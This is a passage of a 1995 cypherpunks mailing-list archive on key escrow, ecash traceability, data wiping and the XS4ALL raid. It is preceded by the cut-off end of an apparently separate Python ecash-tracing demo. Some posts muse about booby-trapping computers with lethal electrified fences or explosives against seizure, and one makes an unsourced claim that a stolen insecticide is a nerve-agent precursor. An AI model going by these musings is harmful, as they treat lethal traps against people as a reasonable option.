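        "payee_from_carol_guess": bank.trace_payee(
            "carol", serial_a, carol.factors[serial_c]),
    }


if __name__ == "__main__":
    print(run_scenario())
```

The bank's own log is consistent with either withdrawer having spent the note, while the real payer, and only the real payer, can hand over a factor that ties the deposit to a withdrawal and so to the depositor's account.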




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 5 Sep 95 14:21:26 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <9509052120.AA02633@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
>  Didn't I just read a day ago that Robert Morris (ex-NSA) cautioned
>  that one should never underestimate the time and effort an opponent
>  is willing to put into recovering your data?
>
>  May I also point out that the rules of economics do not apply to
>  the federal government, since it insists - quite successfully - on
>  having a monopoly on using lethal force to extract arbitrarily large
>  amounts from hundreds of millions of working Americans?

As always, Rubber Hose Cryptanalysis(*tm, patent pending) is usually the  
cheapest way to go...if you're a federal government.

But not all threats are that serious.  For instance, I have no fears that the  
admins here would grovel over the oxides on RAM cells in order to determine  
the pass-phrase of my PGP key if they suspected me of doing something naughty  
(even if they knew this was possible, which is unlikely).

You can get really paranoid about security and rightly so if your opponent is  
a federal government.  However, pushing key-material bits around RAM in order  
to prevent them from being burned into the chips is probably going to do you  
little good if, for instance, a hardware keystroke monitor is surreptitiously  
installed in your keyboard (which is likely far cheaper and easier than  
analysing RAM chips and maybe even disk platters).

BTW, this is not a troll and I know that the possible constitutionality of  
court-ordered disclosure of passphrases or key-material has been hashed over  
many times in the past here, but have any cases with this particular  
attribute gone through court yet?  There were reports even years ago of  
pedophiles and other agents of the Four Horsemen using PGP to encrypt diaries  
and such, have any of these cases gone to court yet and did the prosecution  
attempt to force the defendant to reveal a passphrase??


andrew
(wonders how many readers will take their keyboards apart to look for radio  
transmitters)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 5 Sep 95 14:37:28 PDT
To: Jim Gillogly <jim@rand.org>
Subject: Another Son of Clipper discussion paper
In-Reply-To: <199509052053.NAA01226@mycroft.rand.org>
Message-ID: <9509052136.AA11617@alpha>
MIME-Version: 1.0
Content-Type: text/plain



This is really interesting to me:

Jim Gillogly forwards:
 > Key Escrow Issues Meeting, September 6-7, 1995
 > Discussion Paper #3
 > 
 >                  Export Criteria Discussion Draft --
 >                 64-bit Software Key Escrow Encryption
 > . . .
 >                           --- Draft Export Criteria ---
 > for Software Key Escrow Encryption
 > 
 > Software key escrow encryption products meeting the following
 > criteria will be granted special export licensing...
 > 
 > 1.    The product will use an unclassified encryption algorithm
 >       (e.g., DES, RC4) with a key length not to exceed 64 bits.

Ok, sounds good... but what I don't understand is further on:

 > 5.    The product shall be resistant to any alteration that would
 >       disable or circumvent the key escrow mechanism, to include
 >       being designed so that the key escrow mechanism cannot be
 >       disabled by a static patch, (i.e., the replacement of a
 >       block of code by a modified block).

[ that I can understand ]

 > 6.    The product shall not decrypt messages or files encrypted by
 >       non-escrowed products, including products whose key escrow
 >       mechanisms have been altered or disabled.

This is where I start scratching my head.  I mean, how exactly will
the software be able to tell that what's being fed into it came from a
Good version versus an Evil version of the cryptosystem?  Isn't that
very issue the reason for Skipjack being (A) secret and (B) kept on a
supposedly auto-destruct chip?

If the algorithm is public (and to stretch a point, if the executable
makes it onto somebody's hard disk, it's effectively public), I don't
really understand how the above can be made a realistic goal.  I'd
always thought that the idea behind software key escrow was that it'd
be stuck into most "name-brand" tools, so that Joe Lazy AOL User
wouldn't bother (or wouldn't know how) to circumvent it.  (Still seems
kinda ridiculous, but maybe that's just me.)  Anyway, this document
makes it seem like somebody seriously expects this is doable.  If it
is, then I *really* want to know how (because I'd like to exploit that
sort of technology myself...).

 > 7.    The key escrow mechanism allows access to a user's encrypted
 >       information regardless of whether that user is the sender or
 >       the intended recipient of the encrypted information.

Ooh.

 > 8.    The key escrow mechanism shall not require repeated
 >       involvement by the escrow agents for the recovery of
 >       multiple decryption keys during the period of authorized
 >       access.

Hmm...

 > 9.    In the event any such product is or may be available in the
 >       United States, each production copy of the software shall
 >       either have a unique key required for decrypting messages or
 >       files that is escrowed in accordance with #10, 

Well there go the manufacturing costs up through the roof...

 >       or have the
 >       capability for its escrow mechanism to be rekeyed and any
 >       new key to be escrowed in accordance with #10.

I guess that'd work with the somewhat weak mechanisms used with
"unlockable" CD-ROM stuff.

 > 10.   The product shall accept escrow of its key(s) only with
 >       escrow agents certified by the U.S. Government or by foreign
 >       governments with which the U.S. Government has formal
 >       agreements consistent with U.S. law enforcement and national
 >       security requirements.

Again, how can it tell?

Maybe I'm just being dense.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 5 Sep 95 14:11:36 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <v02120d03ac7260cb02e3@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950905165830.3229A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Lucky Green wrote:

> Date: Tue, 5 Sep 1995 12:45:44 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: Black Unicorn <unicorn@access.digex.net>, cypherpunks@toad.com
> Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
> 
> At 23:44 9/4/95, Black Unicorn wrote:
> [...]
> 
> >3.  The corruption of e-cash to further the above.
> >
> >If the government is disturbed by the laundering of money enough
> >to actually print, or even propose printing, two kinds of
> >currency, how will they respond to untraceable, unaccountable and
> >infinitely liquid e-cash?  I think the answer is in past behavior:
> >e-cash will be linked to the four horsemen and subjected to
> >rigorous reporting requirements- systems which are true e-cash
> >will be banned.
> 
> This is unnecessary, since there is no "true" ecash. DigiCash's ecash in
> its current form, the only version David Chaum is willing to license, is
> fully traceable. Popular Cypherpunk's myths notwithstanding.

Perhaps true, but this assumes that the Chaum method is the only method, 
which I believe to be incorrect.  Perhaps I should use the term "future 
e-cash models" or "True Digital Cash."

Currently there is no "true" e-cash implemented (as far as I know), but 
this is part of the problem.

The product introduced to the public, the original market release
will be (is) traceable, why should the public expect anything different?  In
addition this is exactly what I was talking about in deterring the use of
"real" e-cash.  Real e-cash will be seen as an anomaly, a perversion of e-cash 
to make it sneaky for the four horsemen (or that's how I would play it to 
the public were I a statist).

> 
> First, the recipient of funds is non-anonymous by design. Second, any payer
> can trivially make the recipient of an ecash note known by revealing the
> blinding factor. For purposes of law enforcement, DigiCash's ecash is no
> more secure than if the (insert horseman here) billed his fees to a credit
> card.
> 

Again, one more reason that "real" e-cash will be banned.  The public 
doesn't need it as an alternative is widely available.

This is the curse (or gift) of crippleware- its use as a diversion.
See also, Clipper

> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sam Kaplin" <skaplin@mirage.skypoint.com>
Date: Tue, 5 Sep 95 16:04:54 PDT
To: cypherpunks@toad.com
Subject: Police and scientology visit XS4ALL Amsterdam
Message-ID: <m0sq71T-00056WC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



From: XS4ALL Internet
      Postbus 22864
      1100 DJ  Amsterdam
      tel: +31 20 6222885
      fax: +31 20 6222753



        PRESS RELEASE
        -------------


    Police and members of Scientology church enter offices of XS4ALL
    ================================================================

Amsterdam - Tuesday, September 5, 1995.

Today at about 14:00, XS4ALL was visited by Mr. S. Braan,
bailiff. He was acting on behalf of the Religious
Technology Centre, better known as the Scientology Church, or
Scientology for short. He was assisted by a local police officer and Mr.
Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology
in The Netherlands. Also present were two computer experts (Mr. Ootjes
and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and
two American employees of Scientology, Mr. Weightman and Ms. Jenssen.

Scientology is filing for seizure of XS4ALL's computer equipment. Under
Dutch law, this means that a bailiff comes in to record your assets. In
real-life, the computer-experts that were present have recorded the
types and serial numbers of all the computers in our offices. They did
not take any equipment, the continuity of XS4ALL's services is not in
jeopardy.


What is this all about?
-----------------------

The Scientology Church claims that the XS4ALL anonymous remailer was used
to disseminate documents over the Internet to which the church holds the
legal copyright. This has led the church to ask the president of the
district court of Amsterdam to grant permission for this seizure as a
prelude to legal procedures concerning damages suffered by the church.
The remailer in question has been disabled more than 2 months ago.

During the visit of Scientology to XS4ALL this afternoon, the remailer
was not the subject of any conversation. The organisation seemed totally
preoccupied with the information about Scientology that one of our users
has put on his home page. Part of this information is said to be a file
to which Scientology holds the copyright. If we were to delete the file
in question on the spot, they were willing to drop the seizure.


Responsibility of Internet Providers
------------------------------------

XS4ALL categorically denies any responsibility for contents of users'
homepages. The users decide for themselves what is on their homepage.
Since XS4ALL does not edit the homepages and has no mechanism of
control over the contents we strongly feel that the users themselves are
responsible for what they say on their homepage.

This whole affair demonstrates the need for clarity concerning the legal
position of Internet Providers. We are shocked that our offices can be
invaded by freshly flown-in U.S. cult members. If we as Internet
providers are held responsible for what our users say, that will
undoubtedly kill freedom of speech on the net.


Scare-tactics
-------------

XS4ALL is not alone in receiving this kind of attention from
Scientology. Scientology, a semi-religious multinational, is at war with
a number of people on the Internet. A non-organized group of people on
the net has started to openly discuss the activities of the church.
Until recently, the church has always managed to suppress critical voices
by means of sheer intimidation and by engaging in endless legal battle.

One of the people that Scientology has a problem with is 'fonss', an
XS4ALL user that publishes the F.A.C.T.-net Kit on his home page
(http://www.xs4all.nl/~fonss). This kit (which can be found on numerous
homepages all over the Internet) consists of a large number of documents
that show the true face of Scientology.

One of these documents is a piece to which Scientology supposedly holds
the copyright and which has been added to the kit without the church's
permission.



Additional information can be found on the Internet:

http://www.cybercom.net/~rnewman/scientology/home.html
http://www.xs4all.nl/~fonss
news:alt.religion.scientology
news:alt.censorship
news:alt.clearing.technology




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Tue, 5 Sep 95 18:16:49 PDT
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID: <v01530503ac72b3cf500f@[199.171.88.78]>
MIME-Version: 1.0
Content-Type: text/plain


>   Black Unicorn posted a very interesting info summary on the
>   subject of foreign state US$$ forgery.
>
>This is a story I heard, long ago, from a Brit, Mr Waterlow,
>about something that happened to his grandfather, chairman
>of the Waterlow bank:
>
>Early in this century Portugal didn't print its own money but
>contracted this job to the Waterlow Bank in England. Some
>skilled conmen succeeded in making the bank believe they were
>representatives of the Portuguese National Bank. Then they
>ordered a huge amount of new bills and got away (at least
>for some time) with it.

Tis all in a book: "The Man Who Stole Portugal". I picked it up for about
$2 in a bookstore a few months ago. Very much worth a read. An incredibly
audacious escapade.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
Windsor Consulting Group           |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 5 Sep 95 15:23:36 PDT
To: cypherpunks@toad.com
Subject: Re: SSLRef (SSLtelnet)
In-Reply-To: <199509051940.VAA26244@utopia.hacktic.nl>
Message-ID: <9509052222.AA31819@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Is it possible that since this was only a "test" CA, that netscape used
>less than a full-strength key?  If it was only 512 bits or so, we could
>try cracking it.

Netscape's test cert is for a 1024-bit key.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 5 Sep 95 09:33:35 PDT
To: cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <Pine.SUN.3.91.950905035559.13512A-100000@access2.digex.net>
Message-ID: <Pine.HPP.3.91.950905181951.7412A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


   Black Unicorn posted a very interesting info summary on the
   subject of foreign state US$$ forgery.

This is a story I heard, long ago, from a Brit, Mr Waterlow,
about something that happened to his grandfather, chairman
of the Waterlow bank:

Early in this century Portugal didn't print its own money but
contracted this job to the Waterlow Bank in England. Some
skilled conmen succeeded in making the bank believe they were
representatives of the Portuguese National Bank. Then they
ordered a huge amount of new bills and got away (at least
for some time) with it.
 
Now, the point is that this was actually GOOD for the Portuguese
economy, the real National Bankers having underestimated the
optimal size of their cash stock.

So, I wonder, perhaps the world economy might benefit from
some Iranian addings to the number of $$ around?
A Keynesian boost?
 
Just drifting (I know very little about economy...).
 
Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:58:05 PDT
To: jim@rand.org>
Subject: Re: Another Son of Clipper discussion paper
Message-ID: <v02120d08ac72acec4bb0@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:36 9/5/95, Mike McNally wrote:
>If the algorithm is public (and to stretch a point, if the executable
>makes it onto somebody's hard disk, it's effectively public), I don't
>really understand how the above can be made a realistic goal.

Windows 95 is on a lot of people's hard drives. It is therefore public and
available for every one's inspection.  How many people do you know that
have reverse engineered Windows 95? How many of those use a reverse
engineered version? I'd venture it is zero out of zero.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:57:30 PDT
To: announce <cypherpunks@toad.com
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <v02120d09ac72ae60a310@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:09 9/5/95, announce wrote:
[...]
>    Police and members of Scientology church enter offices of XS4ALL
>    ================================================================

I am wondering about the legalities of booby trapped computer equipment.
Would it be legal if a clear warning to the fact was posted on the
hardware?

Interesting side note: a few months ago, several hundred 5 gallon
containers of insecticide were stolen from the lot of an agricultural
supply dealer here in California.  The incident made a small note in the SF
Chronicle. It was mentioned that the FBI is taking part in the
investigation.

What wasn't mentioned was that this insecticide is an ideal precursor to
various forms of neuro toxins, namely Tabun and Soman, two types of nerve
gas so vicious and toxic that even Hitler refused to approve their use. I
predict that eventful times are just around the corner.




-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:57:33 PDT
To: Sameer R Manek <seawolf@challenger.atc.fhda.edu>
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <v02120d0aac72b1f47a51@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:47 9/5/95, Sameer R Manek wrote:
>> May I also point out that the rules of economics do not apply to the
>> federal government, since it insists - quite successfully - on having a
>> monopoly on using lethal force to extract arbitrarily large amounts from
>> hundreds of millions of working Americans?
>
>How do you figure the above? You only get to go to jail if you don't
>pay taxes...then you can't pick up the soap.

If you aren't willing to pay your taxes, which by the way are nothing but
forced labor for a large part of the year, it is unlikely that you are
willing to spend the same or more forced time manufacturing license plates.
If you resist that kidnapping and introduction into a slave labor camp
that follows a "conviction" for not paying your taxes you will be forced to
comply. If you then resist that force you will be killed.

Chisel it in granite: the ultimate threat by which any government compels
compliance is _always_ lethal force.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 5 Sep 95 16:13:55 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509052300.QAA21504@goblin.punk.net>
Message-ID: <Pine.SUN.3.91.950905191242.18066A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Jeff Simmons wrote:

> Date: Tue, 5 Sep 1995 16:00:38 -0700 (PDT)
> From: Jeff Simmons <jsimmons@goblin.punk.net>
> To: cypherpunks@toad.com
> Subject: Re: NSA says Joe Sixpack won't buy crypto
> 
> > > 
> > > Here's a prediction:  within one year, we will see the advent of Micro$oft's
> > > "Not So Bad Privacy".  It'll be a secret algorithm with either GAK done by
> > > Micro$oft itself, or a flat-out trap door.  ANY communications with a 
> > > Windoze box or network will have to use it, or lose the market.
> > 
> Black Unicorn wrote:
> > 
> > It's here already.
> > It's called "lotus notes."
> > 
> So what form of GAK or trap-door does lotus notes contain?

No, it's just been so weak before the current implementation of RC4 (and 
note the export version still has 40 bits) that it might as well be nothing.

> 
> -- 
> Jeff Simmons                           jsimmons@goblin.punk.net
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 5 Sep 95 18:32:19 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <v02120d03ac7260cb02e3@[192.0.2.1]>
Message-ID: <199509060132.TAA04511@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Lucky Green <shamrock@netcom.com> wrote:
> 
> This is unnecessary, since there is no "true" ecash. DigiCash's ecash in
> its current form, the only version David Chaum is willing to license, is
> fully traceable. Popular Cypherpunk's myths notwithstanding.
> 
> First, the recipient of funds is non-anonymous by design. Second, any payer
> can trivially make the recipient of an ecash note known by revealing the
> blinding factor. For purposes of law enforcement, DigiCash's ecash is no
> more secure than if the (insert horseman here) billed his fees to a credit
> card.


I'm sorry-- what do you mean by "the recipient of funds is non-anonymous"?  
I cannot envision any centralized currency system in which a user's funds
were *not* known to the bank!


Secondly, there is a tremendous difference between a person being able to
identify you as the recipient of their money (which they can pretty much do
anyway, with less surety, just by saying "That's him!  He's the one I gave
it to!") and a third party such as the bank or a government being able to
monitor all your transactions.  For such an organization to perform that feat
on a DigiCash user they would need the cooperation of all of the people with
whom he exchanges currency, and if they have that, then cryptography seems
irrelevant.  :-)


I hope I'm not missing anything here.


Regards,

Bryce

signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBMEz5/vWZSllhfG25AQEVsAQAo27grJhSgGV6iO2vIMILiBiib33/Z/73
Fzj5jgGVgqnlJ73UjHrInSas0p7wdKUf+PeLEtSc4xkMnOPvr3gsT34YAOvO6rcR
DsKwE7mnxK6hmxZl2UkUJ/dhZql5wbT2im27/RC+N2wgaGbahedpJfdjj+QPP06h
uEPTjvT7Yco=
=hDCy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Tue, 5 Sep 95 17:27:53 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <9509052120.AA02633@ch1d157nwk>
Message-ID: <Pine.PMDF.3.91.950905202639.539014490I-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Andrew Loewenstern wrote:

[...]> 
> BTW, this is not a troll and I know that the possible constitutionality of  
> court-ordered disclosure of passphrases or key-material has been hashed over  
> many times in the past here, but have any cases with this particular  
> attribute gone through court yet?  There were reports even years ago of  

AFAIK no reported cases.


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Sep 95 20:17:51 PDT
To: cypherpunks@toad.com
Subject: Lotus Notes vs. the Web and the Net
Message-ID: <ac725ff00c021004df4c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:23 AM 9/6/95, Pat Farrell wrote:

>Of course, Corporate america loves Notes, which is why IBM bought it.
>
>Weak encryption for weak minds.

It may also signal that Lotus Notes has peaked, as IBM has a knack for
"buying at the top."

Interestingly, the current issue of "Wired" (morphed Aryanized OJ) says
that Lotus Notes is tired, and Web-based groupware is wired.

On this one I agree...and I've said this here on this list. Local groups,
such as university departments, corporate departments, even entire
corporations, can use the Web/Net in ways similar to what Lotus Notes
provides (using their own LANs, or even the Internet, with suitable
security steps).


Granted, Lotus Notes currently has more stuff oriented towards groupware
(from what I've been reading for several years, as I'm not a user), but I'd
expect a huge amount of work on Netscape and similar browsers, and other
Net systems,  will make the Web/Net a more common groupware platform.

I don't know this is so, but this is where I'd bet money. No way would I
pay $3 billion for Lotus Notes!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 5 Sep 95 13:45:08 PDT
To: cypherpunks@toad.com
Subject: Re: Non-US SSL128 site
In-Reply-To: <199509051449.KAA13448@joplin.bwh.harvard.edu>
Message-ID: <42icqu$gst@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509051506.AA09665@wombat.sware.com>, jeffb@sware.com (Jeff Barber) writes:
> Adam Shostack writes:
> 
> > | Netscape sells a 128-bit US-only client for $39
> 
> > 	Does the US only server also do des, 3des and IDEA, or just
> > rc4-128?
> 
> Yes.  It does:
> 
>     RC4 - 128
>     RC4 - 40
>     RC2 - 128
>     RC2 - 40
>     IDEA
>     DES, "64 bits"
>     DES "with EDE 3, 192 bits"

  Our software does not implement idea at this time.  It is in the SSL
spec, as a possible cypher choice.  We do implement the rest, including
DES and 3DES.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Sep 95 20:38:15 PDT
To: cypherpunks@toad.com
Subject: Are booby-trapped computers legal?
Message-ID: <ac7263200d0210049f0b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(I've changed the name of this thread.)

At 2:30 AM 9/6/95, Lucky Green wrote:

>I am wondering about the legalities of booby trapped computer equipment.
>Would it be legal if a clear warning to the fact was posted on the
>hardware?

There are two types of "booby traps" to consider:

* Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if and
when a burglar enters. Or an electrified region of a room is set to "get
energized" when an intruder enters. These are "surprises" and are canonical
booby traps.

These have been found to be illegal in several court cases. (I'm not a
lawyer, but I've been reading about them for 20 years. Famous cases where a
burglar sued, and won, because he was injured when breaking into a house.)

* Type 2 Booby Trap: electrified perimeter fences. So long as these are
adequately marked ("If you touch this fence, you will probably die"), and
are not public nuisances where children and pets will inadvertently
validate Darwin's theory, these are--I think--legal. There may be license
fees required, to build an electrified fence, but I think it is possible to
build a lethal voltage electrified fence on one's property.

Thus, I suspect it is fully legal to build an electrified fence around
one's PC, providing suitable warnings are included.

I would not call the second type a real booby trap, though some courts
might, depending. A properly labelled electrified fence seems legal, on
one's own property, but may not be. And certainly I think any
explosive-rigged system is illegal, for explosives reasons if not for booby
trap reasons.

I know of no case law on this, and suspect that if an FBI agent were to be
electrocuted or blown up upon trying to open/use/disconnect the PC, even
with clear warnings, that a prosecution would happen. Results are unclear
(to me).

(I think that if an FBI agent were to be electrocuted while climbing on a
clearly labelled electrified fence, no prosecution would result.)

Of course, if a PC were to be clearly labelled as being rigged, then steps
could presumably be taken to defuse the arrangement.

>Interesting side note: a few months ago, several hundred 5 gallon
>containers of insecticide were stolen from the lot of an agricultural
>supply dealer here in California.  The incident made a small note in the SF
>Chronicle. It was mentioned that the FBI is taking part in the
>investigation.
>
>What wasn't mentioned was that this insecticide is an ideal precursor to
>various forms of neuro toxins, namely Tabun and Soman, two types of nerve
>gas so vicious and toxic that even Hitler refused to approve their use. I
>predict that eventful times are just around the corner.

As Lucky knows, I live out in the country. I agree that some "muckers"
(R.I.P. John Brunner) are likely to mount assaults on urban centers.

Bad news for some. But then the good news is that the threat of nuclear
annihilation has all but gone away completely, and that cancels out an
awful lot of the minor bad news items the scribblers keep telling us are so
awful.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 20:47:45 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID: <v02120d0bac72d46f9337@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:32 9/5/95, Bryce Wilcox wrote:

>I hope I'm not missing anything here.

Only that Ecash has no benefits for transactions that are of an illegal
nature. The meaning of "illegal" is of course increasing as new laws are
passed every session of the legislature.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 20:48:03 PDT
To: cypherpunks@toad.com
Subject: Growth of actions definded as crime. Which math formula?
Message-ID: <v02120d0cac72d4f2b20d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


With every session of Congress, previously legal acts become illegal. Has
anyone worked out a function of this growth (number of crimes in the books
vs. time)? I am not looking at the numbers of laws passed, but at
individual acts that are defined to be illegal. If this has been studied,
what is the formula? If anyone with access to more appropriate lists could
please give me a pointer/forward the post there, I'd be grateful.

TIA,

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 5 Sep 95 21:33:34 PDT
To: cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <199509060432.VAA05003@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: shamrock@netcom.com (Lucky Green)
> So it is harder to compile dossiers on people. Big deal. The recipient can
> still determine who gets the goods paid for by the "anonymous" ecash by
> conventional means (hint: shipping address), so the payee anonymity is of
> little value as far as protecting the privacy of the payer (most likely
> the recipient of the goods) is concerned.

This would be true for physical goods in any payment system, no matter
how anonymous, unless physical remailers are used (and they have their
limitations).  However software (including music, video, etc.) would be
easier to deliver anonymously.  It is generally agreed that more of our
economy is moving towards information exchanges and so ecash-like
systems can play an increasingly larger part in protecting privacy.  To
me, this is indeed a big deal.

Even for physical goods, the use of ecash is better than credit cards
because the information about purchases is distributed rather than
centralized.  Every time I look at my credit card bill I feel dismayed
at what the company is finding out about my family.

Ecash could also be used as a cash replacement in smartcards.  Consider
as an alternative a fully traceable payment system, where you use your
debit card at the supermarket, the bus station, the snack bar, the drug
store.  I suspect that if we don't get something like ecash then this
system will be the alternative.  It opens up possibilities for
dossiers that will fulfill Big Brother's dreams.  Virtually every move
of every citizen will be recorded in just a few centralized places.
IMO the protection of payor privacy that even Chaum's limited ecash
provides is very important.

> Ecash of course is of *no* value for the various assassination markets,
> drug dealing, money laundering, etc that routinely get mentioned in the
> same paragraph as Ecash. The reason is the *full traceability* of the
> payee that has been deliberately built into the current version of Ecash.
> A "feature" that you may rest assured will be part of all future versions
> backed by anyone with even marginal reputation in the financial markets.

Well, I have never fully accepted the notion that crypto was going to
usher in an age of anarchy.  As long as we deal with physical goods in
